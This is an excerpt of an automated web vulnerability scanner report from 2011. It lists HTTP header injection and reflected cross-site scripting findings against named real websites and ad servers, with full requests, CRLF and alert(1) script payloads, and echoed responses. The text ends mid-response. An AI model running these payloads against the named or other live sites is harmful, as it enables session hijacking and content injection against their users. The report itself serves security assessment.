Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:18d0f
36d0a27c0b4
;expires=Wed, 04 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962|0,1,1;expires=Thu, 02 Jun 2011 15:40:54 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=BiLATcGt89ZkdupVLqY8Dm7H~050311;expires=Fri, 30 Apr 2021 15:40:54 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:54 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=140
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:54 GMT
Connection: close
Content-Length: 2869

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',18d0f
36
...[SNIP]...

5.6. http://www.askdramy.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.askdramy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload a720f%0d%0a24490a51821 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /a720f%0d%0a24490a51821 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.askdramy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 10:42:41 GMT
Location: /a720f
24490a51821
/


5.7. http://www.grubhub.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.grubhub.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cd452%0d%0aa194e2e2a1a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /cd452%0d%0aa194e2e2a1a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.grubhub.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:28:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=A365883DD17EA18AD1623BFA28073728.worker3; Path=/
Location: /cd452
a194e2e2a1a
/
Content-Length: 0
Cache-Control: max-age=0
Expires: Tue, 03 May 2011 10:28:28 GMT
Content-Type: text/plain; charset=UTF-8


5.8. http://www.haircuttery.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haircuttery.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 31e48%0d%0ab59fdd1e939 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /31e48%0d%0ab59fdd1e939 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.haircuttery.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 11:27:09 GMT
Server: Apache
Location: http://www.haircuttery.com/31e48
b59fdd1e939
/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


5.9. http://www.homebasedofficework.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.homebasedofficework.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 6e3ad%0d%0a25fc8e03120 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /6e3ad%0d%0a25fc8e03120 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.homebasedofficework.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:11:26 GMT
Location: /6e3ad
25fc8e03120
/


5.10. http://www.imaxenes.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.imaxenes.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 867ba%0d%0a01729b53b75 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /867ba%0d%0a01729b53b75 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imaxenes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 10:47:39 GMT
Server: tigershark/3.0.128 (dn-fh23.directnic.com)
Location: http://recorta.com/abriendo.html/867ba
01729b53b75

Content-Type: text/html
Content-Length: 1185

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
   <META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
   <STYLE type="text/css">
   <!--
       BODY { margin:
...[SNIP]...

6. Cross-site scripting (reflected)  previous  next
There are 140 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


6.1. http://a.collective-media.net/adj/cm.rev_lee/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_lee/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58406'-alert(1)-'d4ead3c9a98 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_lee58406'-alert(1)-'d4ead3c9a98/;sz=300x250;ord=0.3433780161396228? HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 447
Date: Tue, 03 May 2011 15:43:27 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:27 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda490e18de56; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:27 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:27 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_lee58406'-alert(1)-'d4ead3c9a98/;sz=300x250;net=cm;ord=0.3433780161396228;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.2. http://a.collective-media.net/adj/cm.rev_lee/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_lee/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 291cc'-alert(1)-'8906a7a5ed8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_lee/;sz=300x250;ord=0.3433780161396228?&291cc'-alert(1)-'8906a7a5ed8=1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 451
Date: Tue, 03 May 2011 15:43:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:26 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda490a30bd5b; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:26 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:26 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228?&291cc'-alert(1)-'8906a7a5ed8=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.3. http://a.collective-media.net/adj/cm.rev_lee/ [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_lee/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 289a8'-alert(1)-'620c09b5ae1 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_lee/;sz=300x250;ord=0.3433780161396228?289a8'-alert(1)-'620c09b5ae1 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
Content-Length: 448
Date: Tue, 03 May 2011 15:43:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: JY57=CT; expires=Tue, 31-May-2011 15:43:25 GMT; path=/; domain=.collective-media.net
Set-Cookie: cli=11fda490648917b; domain=collective-media.net; path=/; expires=Thu, 02-May-2013 15:43:25 GMT
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Thu, 02-Jun-2011 15:43:25 GMT
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228?289a8'-alert(1)-'620c09b5ae1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

6.4. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44b8e"><script>alert(1)</script>3f4eb266a47 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=44b8e"><script>alert(1)</script>3f4eb266a47 HTTP/1.1
Host: ad.turn.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4535108476472752264; Domain=.turn.com; Expires=Sun, 30-Oct-2011 15:41:35 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:41:34 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=4535108476472752264&rnd=4463050882434824328&fpid=44b8e"><script>alert(1)</script>3f4eb266a47&nu=y&t=&sp=n&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

6.5. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1028d<script>alert(1)</script>d6377ee17ce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/7426971028d<script>alert(1)</script>d6377ee17ce?d=3658195966029417970 HTTP/1.1
Host: ads.adbrite.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3658195966029417970&rnd=3874368748143201778&fpid=12&nu=y&t=&sp=n&purl=
Cookie: Apache="168362123x0.728+1302188608x-1818389268"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUio2yMg1rzEsSDbLKa4xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Tue, 03 May 2011 15:43:21 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/7426971028d<script>alert(1)</script>d6377ee17ce

6.6. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55ecc"-alert(1)-"424757d50d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038&55ecc"-alert(1)-"424757d50d8=1 HTTP/1.1
Host: ads.bluelithium.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 15:41:42 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 15:41:42 GMT
Pragma: no-cache
Content-Length: 4636
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ads.bluelithium.com/imp?55ecc"-alert(1)-"424757d50d8=1&Z=1x1&s=1603038&_salt=1888351049";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array
...[SNIP]...

6.7. http://ar.voicefive.com/b/rc.pli [func parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 8d130<script>alert(1)</script>841f814715e was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction8d130<script>alert(1)</script>841f814715e&n=ar_int_p87077372&1304455353874 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.specificmedia.com/serve/v=5;m=3;l=8610;c=143917;b=856866;ts=20110503114210;cxt=811200901:2280462
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; BMX_G=method->-1,ts->1304437337; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 03 May 2011 15:42:35 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction8d130<script>alert(1)</script>841f814715e("");

6.8. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9203"%3balert(1)//01b0ff57779 was submitted in the $ parameter. This input was echoed as d9203";alert(1)//01b0ff57779 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=d9203"%3balert(1)//01b0ff57779&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:d9203";alert(1)//01b0ff57779;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:13 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=121
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:13 GMT
Connection: close
Content-Length: 2342

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',d9203";alert(1)//01b0ff57779';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,d9203";alert(1)//01b0ff57779;z="+Math.random();}

if(zzuid=='unknown')zzuid='-SHATcGt89Z6bBFZFIn3XV-r~050311';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=-SHATcGt89Z6bBFZ
...[SNIP]...

6.9. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b330b"%3balert(1)//6065934c827 was submitted in the $ parameter. This input was echoed as b330b";alert(1)//6065934c827 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=b330b"%3balert(1)//6065934c827&s=1&z=0.9079998980845427 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(document.cookie)-%22ccebc516c28=1

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:b330b";alert(1)//6065934c827;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675796|0,1,1;expires=Thu, 02 Jun 2011 15:40:56 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=CCLATcGt89YY4OotRHUqIUdE~050311;expires=Fri, 30 Apr 2021 15:40:56 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFgeo=2241452;expires=Wed, 02 May 2012 15:40:56 GMT;domain=.zedo.com;path=/;
ETag: "19b86ed-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 920079178 920078218
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=138
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:40:56 GMT
Connection: close
Content-Length: 2543

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',b330b";alert(1)//6065934c827';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,b330b";alert(1)//6065934c827;z="+Math.random();}

var zzhasAd=undefined;


                                                                                                                                               var zzStr = "s=1;u=unknown;z="
...[SNIP]...

6.10. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3133'%3balert(1)//414af5fb42a was submitted in the $ parameter. This input was echoed as c3133';alert(1)//414af5fb42a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=c3133'%3balert(1)//414af5fb42a&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~050311; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
